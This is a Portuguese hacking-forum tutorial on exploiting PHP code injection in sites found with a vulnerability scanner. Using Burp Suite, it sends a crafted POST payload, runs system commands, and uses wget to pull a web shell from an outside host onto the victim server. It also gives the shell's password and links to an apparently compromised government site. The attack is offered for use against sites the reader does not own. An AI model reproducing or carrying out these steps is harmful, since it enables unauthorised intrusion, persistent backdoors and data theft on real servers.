Ir para conteúdo
Faça parte da equipe! (2024) ×

PHP Code Injection

Dark Army

Por ,
em Cracking - Tutoriais & Dicas

 Compartilhar

Posts Recomendados

Contribuidor

Dark Army 254

Postado
Denunciar
Postado

O que é?

 

A injeção de código PHP é uma vulnerabilidade que permite que um invasor injete código personalizado no mecanismo de script do servidor, essa vulnerabilidade ocorre quando um invasor pode controlar toda ou parte de uma sequência de entrada que é alimentada em uma chamada de função eval(). Eval executará o argumento como código.

 

*Programas Necessários*
Acutenix 
Burpsuite

 

1. Procure um site com essa vulnerabilidade, utilizando o Acutenix, quando ele achar, ele vai mostrar, como demonstra abaixo:
cats00.thumb.jpg.d12ada7c31acad8a4c331050e80d2bfe.jpg

 

2. Veja o diretório da falha, no caso é: /analitics/piwik.php/analitics
O post data que é enviado: page=%24%7b%40print(md5(acunetix_wvs_security_test))%7d&referrer=http://www.site.com.br/

 

Agora vamos ao BurpSuite.


*Lembrando, faça a configuração do proxy no Firefox, etc..*
*Creio que você já sabe disso.*

 

Entre no site com o dir da falha pelo Firefox, exemplo: http://www.site.com.br/analitics/piwik.php/analitics e vai no BurpSuite, e clique em "Forward", entre em HTTP History, vá ao site, e clique com botão direito, e clique em Send Repeater.

 

3. Clique em SEND, agora em RAW, coloque o post data do acutenix.
page=%24%7b%40print(md5(acunetix_wvs_security_test))%7d&referrer=http://www.site.com.br/

 

E mude de GET para POST.

 

Se tudo tiver indo bem, vai ficar igual na imagem abaixo:
cats12.thumb.jpg.d8dd479a8f292d35a433d65226dc6f2c.jpg

 

Agora vamos começar a "invasão".

Clique em "Params" e modifique o page, vai está assim: %24%7b%40print(md5(acunetix_wvs_security_test))%7d
Coloque: ${system('pwd')}

 

Vai retornar: /home/var/www/site.com.br/public_html/analitics

 

Agora coloque: cd .. && wget https://txt.731my.com/wso.txt -O teste00.php

O comando vai ficar: ${system('cd .. && wget https://txt.731my.com/wso.txt -O teste00.php')}

*Pode mudar de shell, caso queira, a senha dessa shell é root*

 

Se a invasão for bem sucedida, vai no site e coloque o nome teste00.php no final.


Exemplo: www.site.com.br/teste00.php, caso for bem sucedido, vai entrar, fique a vontade para se divertir :)

 

*Extra:*
http://www.saosebastiao.sp.leg.br/web.php

  • Curtir 8

 ♚ KING RETURN ♚

 

ᅠᅠTroféus e Medalhasᅠᅠ
Link para o comentário
Compartilhar em outros sites

Participe da Conversa

Você pode postar agora e se cadastrar mais tarde. Cadastre-se Agora para publicar com Sua Conta.
Observação: sua postagem exigirá aprovação do moderador antes de ficar visível.

Unfortunately, your content contains terms that we do not allow. Please edit your content to remove the highlighted words below.
Responder

×   Você colou conteúdo com formatação.   Remover formatação

  Apenas 75 emoticons são permitidos.

×   Seu link foi incorporado automaticamente.   Exibir como um link em vez disso

×   Seu conteúdo anterior foi restaurado.   Limpar Editor

×   Você não pode colar imagens diretamente. Carregar ou inserir imagens do URL.

×
 Compartilhar
Ir para a lista de tópicos

  • Quem Está Navegando   0 membros estão online

    • Nenhum usuário registrado visualizando esta página.
×
×
  • Criar Novo...

Informação Importante

Nós fazemos uso de cookies no seu dispositivo para ajudar a tornar este site melhor. Você pode ajustar suas configurações de cookies , caso contrário, vamos supor que você está bem para continuar.

 Accept Cookies  Reject Cookies